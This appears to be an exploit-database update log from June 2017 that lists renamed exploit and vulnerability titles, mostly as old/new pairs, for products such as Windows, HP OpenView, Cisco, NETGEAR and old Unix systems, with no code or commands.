DB: 2017-06-23
11 new exploits Microsoft Windows - ASN.1 LSASS.exe Remote Exploit (MS04-007) Microsoft Windows - ASN.1 'LSASS.exe' Remote Exploit (MS04-007) Slackware Linux - /usr/bin/ppp-off Insecure /tmp Call Exploit Slackware Linux - '/usr/bin/ppp-off' Insecure /tmp Call Exploit Microsoft Windows XP/2000 - TCP Connection Reset Remote Attack Tool Microsoft Windows XP/2000 - TCP Connection Reset Remote Exploit PostgreSQL 8.01 - Remote Reboot Denial of Service PostgreSQL 8.01 - Remote Reboot (Denial of Service) Cisco IP Phone 7940 - (Reboot) Denial of Service Cisco IP Phone 7940 - Reboot (Denial of Service) Cisco Aironet Wireless Access Points - Memory Exhaustion ARP Attack Denial of Service Cisco Aironet Wireless Access Points - Memory Exhaustion ARP (Denial of Service) Dropbear / OpenSSH Server - (MAX_UNAUTH_CLIENTS) Denial of Service Dropbear / OpenSSH Server - 'MAX_UNAUTH_CLIENTS' Denial of Service 2WIRE Modems/Routers - CRLF Denial of Service 2WIRE Modems/Routers - 'CRLF' Denial of Service FTP Explorer 1.0.1 Build 047 - (CPU Consumption) Remote Denial of Service FTP Explorer 1.0.1 Build 047 - Remote CPU Consumption (Denial of Service) Cisco Phone 7940/7960 - (SIP INVITE) Remote Denial of Service Cisco Phone 7940/7960 - 'SIP INVITE' Remote Denial of Service Mozilla Firefox 2.0.0.3 - / Gran Paradiso 3.0a3 Hang / Crash (Denial of Service) Mozilla Firefox 2.0.0.3 / Gran Paradiso 3.0a3 - Hang / Crash (Denial of Service) Linksys SPA941 - (remote reboot) Remote Denial of Service Linksys SPA941 - Remote Reboot (Denial of Service) CA BrightStor Backup 11.5.2.0 - caloggderd.exe Denial of Service CA BrightStor Backup 11.5.2.0 - Mediasvr.exe Denial of Service CA BrightStor Backup 11.5.2.0 - 'caloggderd.exe' Denial of Service CA BrightStor Backup 11.5.2.0 - 'Mediasvr.exe' Denial of Service Galaxy FTP Server 1.0 - (Neostrada Livebox DSL Router) Denial of Service Galaxy FTP Server 1.0 (Neostrada Livebox DSL Router) - Denial of Service Mcafee EPO 4.0 - FrameworkService.exe Remote Denial of Service Mcafee EPO 4.0 - 'FrameworkService.exe' Remote Denial of Service Xerox Phaser 8400 - (reboot) Remote Denial of Service Xerox Phaser 8400 - Remote Reboot (Denial of Service) Microsoft Windows Mobile 6.0 - Device long name Remote Reboot Exploit Microsoft Windows Mobile 6.0 - Device Long Name Remote Reboot (Denial of Service) Linksys WAG54G v2 (Wireless ADSL Router) - httpd Denial of Service Linksys WAG54G v2 Wireless ADSL Router - httpd Denial of Service Netgear SSL312 Router - Denial of Service NETGEAR SSL312 Router - Denial of Service Netgear WGR614v9 Wireless Router - Denial of Service NETGEAR WGR614v9 Wireless Router - Denial of Service Gigaset SE461 WiMAX router - Remote Denial of Service Gigaset SE461 WiMAX Router - Remote Denial of Service Netgear DG632 Router - Remote Denial of Service NETGEAR DG632 Router - Remote Denial of Service Sun xVM VirtualBox 2.2 < 3.0.2 r49928 - Local Host Reboot (PoC) Sun xVM VirtualBox 2.2 < 3.0.2 r49928 - Local Host Reboot (Denial of Service) (PoC) Apple iPhone 2.2.1/3.x - (MobileSafari) Crash + Reboot Exploit Apple iPhone 2.2.1/3.x - (MobileSafari) Crash + Reboot (Denial of Service) Siemens Gigaset SE361 WLAN - Remote Reboot Exploit Siemens Gigaset SE361 WLAN - Remote Reboot (Denial of Service) Apple Mac OSX 10.6 - HFS File System Attack (Denial of Service) Apple Mac OSX 10.6 - HFS FileSystem Exploit (Denial of Service) HP OpenView Network Node Manager (OV NNM) - webappmon.exe execvp_nc Remote Code Execution HP OpenView Network Node Manager (OV NNM) - 'webappmon.exe' 'execvp_nc' Remote Code Execution Cyclope Internet Filtering Proxy 4.0 - CEPMServer.exe Denial of Service (PoC) Cyclope Internet Filtering Proxy 4.0 - 'CEPMServer.exe' Denial of Service (PoC) AirTies-4450 - Unauthorized Remote Reboot AirTies-4450 - Unauthorized Remote Reboot (Denial of Service) Digital Ultrix 4.0/4.1 - /usr/bin/chroot Exploit SunOS 4.1.1 - /usr/release/bin/makeinstall Exploit SunOS 4.1.1 - /usr/release/bin/winstall Exploit Digital Ultrix 4.0/4.1 - '/usr/bin/chroot' Exploit SunOS 4.1.1 - '/usr/release/bin/makeinstall' Exploit SunOS 4.1.1 - '/usr/release/bin/winstall' Exploit Linux Kernel 2.2 - 'ldd core' Force Reboot Linux Kernel 2.2 - 'ldd core' Force Reboot (Denial of Service) Omnicron OmniHTTPd 1.1/2.0 Alpha 1 - visiadmin.exe Denial of Service Omnicron OmniHTTPd 1.1/2.0 Alpha 1 - 'visiadmin.exe' Denial of Service OReilly WebSite 1.x/2.0 - win-c-sample.exe Buffer Overflow OReilly WebSite 1.x/2.0 - 'win-c-sample.exe' Buffer Overflow Microsoft Internet Explorer 5.0.1/5.5 - 'mstask.exe' CPU Consumption Microsoft Internet Explorer 5.0.1/5.5 - 'mstask.exe' CPU Consumption (Denial of Service) ID Software Quake 3 - 'smurf attack' Denial of Service ID Software Quake 3 - 'SMURF' Denial of Service Melange Chat System 2.0.2 Beta 2 - /yell Remote Buffer Overflow Melange Chat System 2.0.2 Beta 2 - '/yell' Remote Buffer Overflow Microsoft Windows NT/2000 - cmd.exe CD Buffer Overflow Microsoft Windows NT/2000 - 'cmd.exe' CD Buffer Overflow Gordano Messaging Suite 9.0 - WWW.exe Denial of Service Gordano Messaging Suite 9.0 - 'WWW.exe' Denial of Service TYPSoft FTP Server 1.1 - Remote CPU Consumption Denial of Service TYPSoft FTP Server 1.1 - Remote CPU Consumption (Denial of Service) Microsoft Windows XP - explorer.exe Remote Denial of Service Microsoft Windows XP - 'explorer.exe' Remote Denial of Service VMware Workstation - vprintproxy.exe JPEG2000 Images Multiple Memory Corruptions VMware Workstation - 'vprintproxy.exe' JPEG2000 Images Multiple Memory Corruptions Gattaca Server 2003 - web.tmpl Language Variable CPU Consumption Denial of Service Gattaca Server 2003 - 'web.tmpl' 'Language' Parameter CPU Consumption (Denial of Service) VMware Workstation - vprintproxy.exe TrueType NAME Tables Heap Buffer Overflow VMware Workstation - 'vprintproxy.exe' TrueType NAME Tables Heap Buffer Overflow Microsoft Windows XP - explorer.exe .tiff Image Denial of Service Microsoft Windows XP - 'explorer.exe' '.tiff' Image Denial of Service Microsoft Windows XP - TSShutdn.exe Remote Denial of Service Microsoft Windows XP - 'TSShutdn.exe' Remote Denial of Service Orenosv HTTP/FTP Server 0.8.1 - CGISSI.exe Remote Buffer Overflow Orenosv HTTP/FTP Server 0.8.1 - 'CGISSI.exe' Remote Buffer Overflow PHPMailer 1.7 - Data() Function Remote Denial of Service PHPMailer 1.7 - 'Data()' Function Remote Denial of Service Sights 'N Sounds Streaming Media Server 2.0.3 - SWS.exe Buffer Overflow Sights 'N Sounds Streaming Media Server 2.0.3 - 'SWS.exe' Buffer Overflow DSocks 1.3 - Name Variable Buffer Overflow DSocks 1.3 - 'Name' Parameter Buffer Overflow Microsoft Class Package Export Tool 5.0.2752 - Clspack.exe Local Buffer Overflow Microsoft Class Package Export Tool 5.0.2752 - 'Clspack.exe' Local Buffer Overflow Android Zygote - Socket and Fork bomb Attack Android Zygote - Socket and Fork Bomb (Denial of Service) Nvidia NView 3.5 - Keystone.exe Local Denial of Service Nvidia NView 3.5 - 'Keystone.exe' Local Denial of Service Ipswitch WS_FTP 2007 Professional - WSFTPURL.exe Local Memory Corruption Ipswitch WS_FTP 2007 Professional - 'WSFTPURL.exe' Local Memory Corruption Larson Network Print Server 9.4.2 build 105 - (LstNPS) NPSpcSVR.exe License Command Remote Overflow Larson Network Print Server 9.4.2 build 105 (LstNPS) - 'NPSpcSVR.exe' License Command Remote Overflow Linksys WRH54G 1.1.3 - (Wireless-G Router) Malformed HTTP Request Denial of Service Linksys WRH54G 1.1.3 Wireless-G Router - Malformed HTTP Request Denial of Service Ability FTP Server 2.1.4 - afsmain.exe USER Command Remote Denial of Service Ability FTP Server 2.1.4 - 'afsmain.exe' USER Command Remote Denial of Service Adobe Flash - Setting Variable Use-After-Free Adobe Flash - 'Setting' Variable Use-After-Free Git 1.9.5 - ssh-agent.exe Buffer Overflow Git 1.9.5 - 'ssh-agent.exe' Buffer Overflow Apple Mac OSX 10.11 - FTS Deep Structure of the File System Buffer Overflow Apple Mac OSX 10.11 - FTS Deep Structure of the FileSystem Buffer Overflow Adobe Flash TextField Variable - Use-After Free Adobe Flash TextField.Variable Setter - Use-After-Free Adobe Flash - 'TextField' Variable Use-After Free Adobe Flash - TextField.Variable Setter Use-After-Free Seowon Intech WiMAX SWC-9100 Router - /cgi-bin/reboot.cgi Unauthenticated Remote Reboot Denial of Service Seowon Intech WiMAX SWC-9100 Router - '/cgi-bin/reboot.cgi' Unauthenticated Remote Reboot (Denial of Service) Microsoft WinDbg - logviewer.exe Crash (PoC) Microsoft WinDbg - 'logviewer.exe' Crash (PoC) Microsoft Windows - 'win32k!NtGdiExtGetObjectW' Kernel Stack Memory Disclosure Microsoft Windows - 'win32k!NtGdiGetOutlineTextMetricsInternalW' Kernel Stack Memory Disclosure Microsoft Windows - 'win32k!NtGdiGetTextMetricsW' Kernel Stack Memory Disclosure Microsoft Windows - 'win32k!NtGdiGetRealizationInfo' Kernel Stack Memory Disclosure Microsoft Windows - 'win32k!ClientPrinterThunk' Kernel Stack Memory Disclosure Microsoft Windows - 'nt!NtQueryInformationJobObject (BasicLimitInformation_ ExtendedLimitInformation)' Kernel Stack Memory Disclosure Microsoft Windows - 'nt!NtQueryInformationProcess (ProcessVmCounters)' Kernel Stack Memory Disclosure Microsoft Windows - 'win32k!NtGdiMakeFontDir' Kernel Stack Memory Disclosure Microsoft Windows - 'nt!NtQueryInformationJobObject (information class 12)' Kernel Stack Memory Disclosure Microsoft Windows - 'nt!NtQueryInformationJobObject (information class 28)' Kernel Stack Memory Disclosure Microsoft Windows - 'nt!NtQueryInformationTransaction (information class 1)' Kernel Stack Memory Disclosure UUCP Exploit - File Creation/Overwriting (symlinks) Exploit UUCP Exploit - File Creation/Overwriting (Symlinks) Exploit HP-UX 11.0 - /bin/cu Privilege Escalation HP-UX 11.0 - '/bin/cu' Privilege Escalation Solaris 2.6 / 2.7 - /usr/bin/write Local Overflow Solaris 2.6 / 2.7 - '/usr/bin/write' Local Overflow IRIX (5.3/6.2/6.3/6.4/6.5/6.5.11) - /usr/bin/lpstat Local Exploit IRIX 5.3/6.2/6.3/6.4/6.5/6.5.11 - /usr/lib/print/netprint Local Exploit IRIX 5.3/6.2/6.3/6.4/6.5/6.5.11 - '/usr/bin/lpstat' Local Exploit IRIX 5.3/6.2/6.3/6.4/6.5/6.5.11 - '/usr/lib/print/netprint' Local Exploit Tru64 UNIX 4.0g - /usr/bin/at Privilege Escalation Slackware 7.1 - /usr/bin/mail Local Exploit Tru64 UNIX 4.0g - '/usr/bin/at' Privilege Escalation Slackware 7.1 - '/usr/bin/mail' Local Exploit Solaris 2.4 - /bin/fdformat Local Buffer Overflows Solaris 2.5.1 lp and lpsched - Symlink Vulnerabilities Solaris 2.4 - '/bin/fdformat' Local Buffer Overflow Solaris 2.5.1 lp / lpsched - Symlink Vulnerabilities AIX 4.2 - /usr/dt/bin/dtterm Local Buffer Overflow AIX 4.2 - '/usr/dt/bin/dtterm' Local Buffer Overflow SGI IRIX - /bin/login Local Buffer Overflow IRIX 5.3 - /usr/sbin/iwsh Buffer Overflow Privilege Escalation SGI IRIX - '/bin/login Local' Buffer Overflow IRIX 5.3 - '/usr/sbin/iwsh' Buffer Overflow Privilege Escalation Apple Mac OSX 10.3.7 - mRouter Privilege Escalation Apple Mac OSX 10.3.7 - 'mRouter' Privilege Escalation Sudo 1.6.8p9 - (SHELLOPTS/PS4 ENV variables) Privilege Escalation Sudo 1.6.8p9 - SHELLOPTS/PS4 Environment Variables Privilege Escalation Appfluent Database IDS < 2.1.0.103 - (Env Variable) Local Exploit Appfluent Database IDS < 2.1.0.103 - Environment Variable Local Exploit HP-UX 11i - (LIBC TZ enviroment Variable) Privilege Escalation HP-UX 11i - 'LIBC TZ' Enviroment Variable Privilege Escalation Xcode OpenBase 10.0.0 (OSX) - (symlink) Privilege Escalation Xcode OpenBase 10.0.0 (OSX) - Symlink Privilege Escalation Adobe Photoshop CS2 - / CS3 Unspecified '.bmp' File Buffer Overflow Adobe Photoshop CS2 / CS3 - Unspecified '.bmp' File Buffer Overflow Debian - (symlink attack in login) Arbitrary File Ownership (PoC) Debian - (Symlink In Login) Arbitrary File Ownership (PoC) Cain & Abel 4.9.25 - (Cisco IOS-MD5) Local Buffer Overflow Cain & Abel 4.9.25 - 'Cisco IOS-MD5' Local Buffer Overflow xscreensaver 5.01 - Arbitrary File Disclosure Symlink Attack xscreensaver 5.01 - Arbitrary File Disclosure Symlink Exploit PHP 5.2.12/5.3.1 - symlink() open_basedir Bypass PHP 5.2.12/5.3.1 - 'symlink()' open_basedir Bypass HP OpenView Network Node Manager (OV NNM) 7.53 - ovwebsnmpsrv.exe Buffer Overflow (SEH) HP OpenView Network Node Manager (OV NNM) 7.53 - 'ovwebsnmpsrv.exe' Buffer Overflow (SEH) Microsoft Windows 7 - 'wab32res.dll' wab.exe DLL Microsoft Windows 7 - 'wab32res.dll' 'wab.exe' DLL Hijacking Oracle 10/11g - exp.exe Parameter file Local Buffer Overflow (PoC) Oracle 10/11g - 'exp.exe' 'file' Parameter Local Buffer Overflow (PoC) ISC BIND 4.9.7 -T1B - named SIGINT and SIGIOT symlink ISC BIND 4.9.7 -T1B - named SIGINT and SIGIOT Symlink Exploit Hancom Office 2007 - Reboot.ini Clear-Text Passwords Hancom Office 2007 - 'Reboot.ini' Clear-Text Passwords G. Wilford man 2.3.10 - Symlink G. Wilford man 2.3.10 - Symlink Exploit X11R6 3.3.3 - Symlink X11R6 3.3.3 - Symlink Exploit SGI IRIX 6.2 - /usr/lib/netaddpr Exploit SGI IRIX 6.2 - '/usr/lib/netaddpr' Exploit SCO Open Server 5.0.5 - 'userOsa' symlink SCO Open Server 5.0.5 - 'userOsa' Symlink Exploit Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4/SP5/SP6 - Spoolss.exe DLL Insertion Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4/SP5/SP6 - 'Spoolss.exe' DLL Insertion FreeBSD 3.3 gdc - Symlink FreeBSD 3.3 gdc - Symlink Exploit SCO Unixware 7.0/7.0.1/7.1/7.1.1 - 'coredump' Symlink SCO Unixware 7.0/7.0.1/7.1/7.1.1 - 'coredump' Symlink Exploit FreeBSD 3.4 / NetBSD 1.4.1 / OpenBSD 2.6 - /proc File Sytem FreeBSD 3.4 / NetBSD 1.4.1 / OpenBSD 2.6 - '/proc' FileSystem Exploit Debian 2.1 - apcd Symlink Debian 2.1 - apcd Symlink Exploit SCO Unixware 7.1/7.1.1 - ARCserver /tmp symlink SCO Unixware 7.1/7.1.1 - ARCserver /tmp Symlink Exploit Sun Workshop 5.0 - Licensing Manager Symlink Sun Workshop 5.0 - Licensing Manager Symlink Exploit Netscape Communicator 4.5/4.51/4.6/4.61/4.7/4.72/4.73 - /tmp Symlink Netscape Communicator 4.5/4.51/4.6/4.61/4.7/4.72/4.73 - '/tmp' Symlink Exploit OpenLDAP 1.2.7/1.2.8/1.2.9/1.2.10 - '/usr/tmp/' Symlink OpenLDAP 1.2.7/1.2.8/1.2.9/1.2.10 - '/usr/tmp/' Symlink Exploit KDE 1.1 - /1.1.1/1.1.2/1.2 kdesud DISPLAY Environment Variable Overflow KDE 1.1/1.1.1/1.1.2/1.2 - kdesud DISPLAY Environment Variable Overflow HP-UX 10.20/11.0 man - /tmp Symlink Exploit HP-UX 10.20/11.0 - man '/tmp' Symlink Exploit HP-UX 10.20/11.0 crontab - /tmp File HP-UX 10.20/11.0 - crontab '/tmp' File Exploit Solaris 10 Patch 137097-01 - Symlink Attack Privilege Escalation Solaris 10 Patch 137097-01 - Symlink Privilege Escalation Tower Toppler 0.99.1 - Display Variable Local Buffer Overflow Tower Toppler 0.99.1 - 'Display' Parameter Local Buffer Overflow Microsoft Windows Server 2000 - RegEdit.exe Registry Key Value Buffer Overflow Microsoft Windows Server 2000 - 'RegEdit.exe' Registry Key Value Buffer Overflow RedHat 9.0 / Slackware 8.1 - /bin/mail Carbon Copy Field Buffer Overrun RedHat 9.0 / Slackware 8.1 - '/bin/mail' Carbon Copy Field Buffer Overrun Linux Kernel 2.2.x / 2.4.x - /proc Filesystem Potential Information Disclosure Linux Kernel 2.2.x / 2.4.x - '/proc' Filesystem Potential Information Disclosure Microsoft Windows XP/2000 - RunDLL32.exe Buffer Overflow Microsoft Windows XP/2000 - 'RunDLL32.exe' Buffer Overflow Tower Toppler 0.96 - HOME Environment Variable Local Buffer Overflow Tower Toppler 0.96 - 'HOME Environment' Parameter Local Buffer Overflow Top 1.x/2.0 - Home Environment Variable Local Buffer Overflow Top 1.x/2.0 - 'Home Environment' Parameter Local Buffer Overflow XBlast 2.6.1 - HOME Environment Variable Buffer Overflow XBlast 2.6.1 - 'HOME Environment' Variable Buffer Overflow XPCD 2.0.8 - Home Environment Variable Local Buffer Overflow XPCD 2.0.8 - 'Home Environment' Variable Local Buffer Overflow XSOK 1.0 2 - LANG Environment Variable Local Buffer Overrun XSOK 1.0 2 - 'LANG Environment' Variable Local Buffer Overrun Linux Kernel 2.6.32-5 (Debian 6.0.5) - /dev/ptmx Key Stroke Timing Local Disclosure Linux Kernel 2.6.32-5 (Debian 6.0.5) - '/dev/ptmx' Key Stroke Timing Local Disclosure ELinks Relative 0.10.6 - /011.1 Path Arbitrary Code Execution ELinks Relative 0.10.6 / 011.1 - Path Arbitrary Code Execution Oracle - HtmlConverter.exe Buffer Overflow Oracle - 'HtmlConverter.exe' Buffer Overflow Linux Kernel 2.6.32 (Ubuntu 10.04) - /proc Handling SUID Privilege Escalation Linux Kernel 2.6.32 (Ubuntu 10.04) - '/proc' Handling SUID Privilege Escalation Linux pam_lib_smb < 1.1.6 - /bin/login Remote Exploit Linux pam_lib_smb < 1.1.6 - '/bin/login' Remote Exploit Microsoft Windows - DHCP Client Broadcast Attack Exploit (MS06-036) Microsoft Windows - DHCP Client Broadcast Exploit (MS06-036) Cisco VPN 3000 Concentrator 4.1.7 / 4.7.2 - (FTP) Remote Exploit Cisco VPN 3000 Concentrator 4.1.7 / 4.7.2 - 'FTP' Remote Exploit Oracle 9i / 10g - 'utl_file' File System Access Exploit Oracle 9i / 10g - 'utl_file' FileSystem Access Exploit HP OpenView Network Node Manager (OV NNM) 7.5.1 - ovalarmsrv.exe Remote Overflow HP OpenView Network Node Manager (OV NNM) 7.5.1 - 'ovalarmsrv.exe' Remote Overflow Cisco IOS 12.3(18) FTP Server - Remote Exploit (attached to gdb) Cisco IOS 12.3(18) - FTP Server Remote Exploit (Attached to GDB) Sagem F@ST (Routers) - (dhcp hostname attack) Cross-Site Request Forgery Sagem F@ST Routers - DHCP Hostname Cross-Site Request Forgery Microsoft PicturePusher - ActiveX Cross-Site Arbitrary File Upload Attack (PoC) Microsoft PicturePusher - ActiveX Cross-Site Arbitrary File Upload (PoC) Microsoft Windows - SmbRelay3 NTLM Replay Attack Tool/Exploit (MS08-068) Microsoft Windows - SmbRelay3 NTLM Replay Exploit (MS08-068) Optus/Huawei E960 HSDPA Router - Sms Cross-Site Scripting Attack Optus/Huawei E960 HSDPA Router - Sms Cross-Site Scripting Apple Safari 3.2.x - (XXE attack) Local File Theft Apple Safari 3.2.x - (XXE) Local File Theft Netgear DG632 Router - Authentication Bypass NETGEAR DG632 Router - Authentication Bypass BRS Webweaver 1.33 - /Scripts Access Restriction Bypass BRS Webweaver 1.33 - '/Scripts' Access Restriction Bypass Ada Image Server 0.6.7 - imgsrv.exe Buffer Overflow Ada Image Server 0.6.7 - 'imgsrv.exe' Buffer Overflow HP OpenView Network Node Manager (OV NNM) 7.53 - ovalarm.exe CGI Unauthenticated Remote Buffer Overflow HP OpenView Network Node Manager (OV NNM) 7.53 - 'ovalarm.exe' CGI Unauthenticated Remote Buffer Overflow HMS HICP Protocol + Intellicom - NetBiterConfig.exe Remote Buffer Overflow Cisco ASA 8.x - VPN SSL module Clientless URL-list control Bypass HMS HICP Protocol + Intellicom - 'NetBiterConfig.exe' Remote Buffer Overflow Cisco ASA 8.x - VPN SSL Module Clientless URL-list control Bypass HP OpenView Network Node Manager (OV NNM) - OvWebHelp.exe CGI Topic Overflow HP OpenView Network Node Manager (OV NNM) - 'OvWebHelp.exe' CGI Topic Overflow HP OpenView Network Node Manager (OV NNM) - getnnmdata.exe CGI Invalid MaxAge Remote Code Execution HP OpenView Network Node Manager (OV NNM) - getnnmdata.exe CGI Invalid ICount Remote Code Execution HP OpenView Network Node Manager (OV NNM) - getnnmdata.exe CGI Invalid Hostname Remote Code Execution HP OpenView Network Node Manager (OV NNM) - 'getnnmdata.exe' CGI Invalid MaxAge Remote Code Execution HP OpenView Network Node Manager (OV NNM) - 'getnnmdata.exe' CGI Invalid ICount Remote Code Execution HP OpenView Network Node Manager (OV NNM) - 'getnnmdata.exe' CGI Invalid Hostname Remote Code Execution minerCPP 0.4b - Remote Buffer Overflow / Format String Attack Exploit minerCPP 0.4b - Remote Buffer Overflow / Format String Comtrend ADSL Router CT-5367 C01_R12 - Remote Code Execution COMTREND ADSL Router CT-5367 C01_R12 - Remote Code Execution HP - OmniInet.exe MSG_PROTOCOL Buffer Overflow (Metasploit) (1) HP - 'OmniInet.exe' MSG_PROTOCOL Buffer Overflow (Metasploit) (1) HP - OmniInet.exe MSG_PROTOCOL Buffer Overflow (Metasploit) (2) HP - 'OmniInet.exe' MSG_PROTOCOL Buffer Overflow (Metasploit) (2) Microsoft Internet Explorer - Winhlp32.exe MsgBox Code Execution (MS10-023) (Metasploit) Microsoft Internet Explorer - 'Winhlp32.exe' MsgBox Code Execution (MS10-023) (Metasploit) IBM Lotus Domino Sametime - STMux.exe Stack Buffer Overflow (Metasploit) IBM Lotus Domino Sametime - 'STMux.exe' Stack Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) 7.53/7.51 - OVAS.exe Unauthenticated Stack Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) 7.53/7.51 - 'OVAS.exe' Unauthenticated Stack Buffer Overflow (Metasploit) HP OpenView Network Node Manager - Snmp.exe CGI Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) - 'Snmp.exe' CGI Buffer Overflow (Metasploit) HP OpenView Network Node Manager - OvWebHelp.exe CGI Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) - 'OvWebHelp.exe' CGI Buffer Overflow (Metasploit) HP OpenView Network Node Manager - Toolbar.exe CGI Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) - 'Toolbar.exe' CGI Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) - ovalarm.exe CGI Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) - 'ovalarm.exe' CGI Buffer Overflow (Metasploit) HP OpenView Network Node Manager - OpenView5.exe CGI Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) - 'OpenView5.exe' CGI Buffer Overflow (Metasploit) IBM TPM for OS Deployment 5.1.0.x - rembo.exe Buffer Overflow (Metasploit) IBM TPM for OS Deployment 5.1.0.x - 'rembo.exe' Buffer Overflow (Metasploit) Trend Micro ServerProtect 5.58 - EarthAgent.exe Buffer Overflow (Metasploit) Trend Micro ServerProtect 5.58 - 'EarthAgent.exe' Buffer Overflow (Metasploit) HP Network Node Manager (NMM) - CGI webappmon.exe OvJavaLocale Buffer Overflow (Metasploit) HP Network Node Manager (NMM) - CGI webappmon.exe execvp Buffer Overflow (Metasploit) HP Network Node Manager (NMM) - CGI 'webappmon.exe' 'OvJavaLocale' Buffer Overflow (Metasploit) HP Network Node Manager (NMM) - CGI 'webappmon.exe' 'execvp' Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) - nnmRptConfig.exe schdParams Buffer Overflow (Metasploit) HP OpenView Network Node Manager - snmpviewer.exe Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) - getnnmdata.exe (ICount) CGI Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) - ovwebsnmpsrv.exe main Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) getnnmdata.exe (MaxAge) CGI Buffer Overflow (Metasploit) HP OpenView Network Node Manager - ovwebsnmpsrv.exe Unrecognized Option Buffer Overflow (Metasploit) HP OpenView Network Node Manager - ovwebsnmpsrv.exe ovutil Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) - getnnmdata.exe (Hostname) CGI Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) - 'nnmRptConfig.exe' 'schdParams' Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) - 'snmpviewer.exe' Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) - 'getnnmdata.exe' 'ICount' CGI Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) - 'ovwebsnmpsrv.exe' 'main' Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) - 'getnnmdata.exe' (MaxAge) CGI Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) - 'ovwebsnmpsrv.exe' Unrecognized Option Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) - 'ovwebsnmpsrv.exe' 'ovutil' Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) - 'getnnmdata.exe' 'Hostname' CGI Buffer Overflow (Metasploit) 7-Technologies IGSS 9.00.00 b11063 - IGSSdataServer.exe Stack Overflow (Metasploit) 7-Technologies IGSS 9.00.00 b11063 - 'IGSSdataServer.exe' Stack Overflow (Metasploit) Citrix Provisioning Services 5.6 - streamprocess.exe Buffer Overflow (Metasploit) Citrix Provisioning Services 5.6 - 'streamprocess.exe' Buffer Overflow (Metasploit) FactoryLink - vrn.exe Opcode 9 Buffer Overflow (Metasploit) FactoryLink - 'vrn.exe' Opcode 9 Buffer Overflow (Metasploit) HP - OmniInet.exe Opcode 27 Buffer Overflow (Metasploit) HP - 'OmniInet.exe' Opcode 27 Buffer Overflow (Metasploit) Symantec Backup Exec 12.5 - MiTM Attack Symantec Backup Exec 12.5 - Man In The Middle Exploit HP OpenView Network Node Manager - Toolbar.exe CGI Cookie Handling Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) - 'Toolbar.exe' CGI Cookie Handling Buffer Overflow (Metasploit) Sunway Force Control SCADA 6.1 SP3 - httpsrv.exe Exploit Sunway Force Control SCADA 6.1 SP3 - 'httpsrv.exe' Exploit Procyon Core Server HMI 1.13 - Coreservice.exe Stack Buffer Overflow (Metasploit) Procyon Core Server HMI 1.13 - 'Coreservice.exe' Stack Buffer Overflow (Metasploit) HP Diagnostics Server - magentservice.exe Overflow (Metasploit) HP Diagnostics Server - 'magentservice.exe' Overflow (Metasploit) Sunway ForceControl - SNMP NetDBServer.exe Opcode 0x57 (Metasploit) Sunway ForceControl - SNMP 'NetDBServer.exe' Opcode 0x57 (Metasploit) Trend Micro Control Manger 5.5 - CmdProcessor.exe Stack Buffer Overflow (Metasploit) Trend Micro Control Manger 5.5 - 'CmdProcessor.exe' Stack Buffer Overflow (Metasploit) Antelope Software W4-Server 2.6 a/Win32 - Cgitest.exe Buffer Overflow Antelope Software W4-Server 2.6 a/Win32 - 'Cgitest.exe' Buffer Overflow Netscape Enterprise Server / Novell Groupwise 5.2/5.5 GWWEB.EXE - Multiple Vulnerabilities Netscape Enterprise Server / Novell Groupwise 5.2/5.5 - 'GWWEB.EXE' Multiple Vulnerabilities FrontPage 98/Personal WebServer 1.0 / Personal Web Server 2.0 - htimage.exe File Existence Disclosure FrontPage 98/Personal WebServer 1.0 / Personal Web Server 2.0 - 'htimage.exe' File Existence Disclosure NAI Net Tools PKI Server 1.0 - strong.exe Buffer Overflow NAI Net Tools PKI Server 1.0 - 'strong.exe' Buffer Overflow Mandrake 6.1/7.0/7.1 - /perl http Directory Disclosure Mandrake 6.1/7.0/7.1 - '/perl' HTTP Directory Disclosure Microsoft IIS 3.0 - newdsn.exe File Creation Microsoft IIS 3.0 - 'newdsn.exe' File Creation Greg Matthews - Classifieds.cgi 1.0 Hidden Variable Greg Matthews - 'Classifieds.cgi' 1.0 Hidden Variable WebCom datakommunikation Guestbook 0.1 - wguest.exe Arbitrary File Access WebCom datakommunikation Guestbook 0.1 - rguest.exe Arbitrary File Access WebCom datakommunikation Guestbook 0.1 - 'wguest.exe' Arbitrary File Access WebCom datakommunikation Guestbook 0.1 - 'rguest.exe' Arbitrary File Access MetaProducts Offline Explorer 1.x - File System Disclosure MetaProducts Offline Explorer 1.x - FileSystem Disclosure Cisco Secure IDS 2.0/3.0 / Snort 1.x / ISS RealSecure 5/6 / NFR 5.0 - Encoded IIS Attack Detection Evasion Cisco Secure IDS 2.0/3.0 / Snort 1.x / ISS RealSecure 5/6 / NFR 5.0 - Encoded IIS Detection Evasion Webmin 1.580 - /file/show.cgi Remote Command Execution (Metasploit) Webmin 1.580 - '/file/show.cgi' Remote Command Execution (Metasploit) HP Operations Agent Opcode - coda.exe 0x8c Buffer Overflow (Metasploit) HP Operations Agent - Opcode coda.exe 0x34 Buffer Overflow (Metasploit) HP Operations Agent - Opcode 'coda.exe' 0x8c Buffer Overflow (Metasploit) HP Operations Agent - Opcode 'coda.exe' 0x34 Buffer Overflow (Metasploit) Netgear FM114P ProSafe Wireless Router - UPnP Information Disclosure NETGEAR FM114P ProSafe Wireless Router - UPnP Information Disclosure Netgear FM114P ProSafe Wireless Router - Rule Bypass 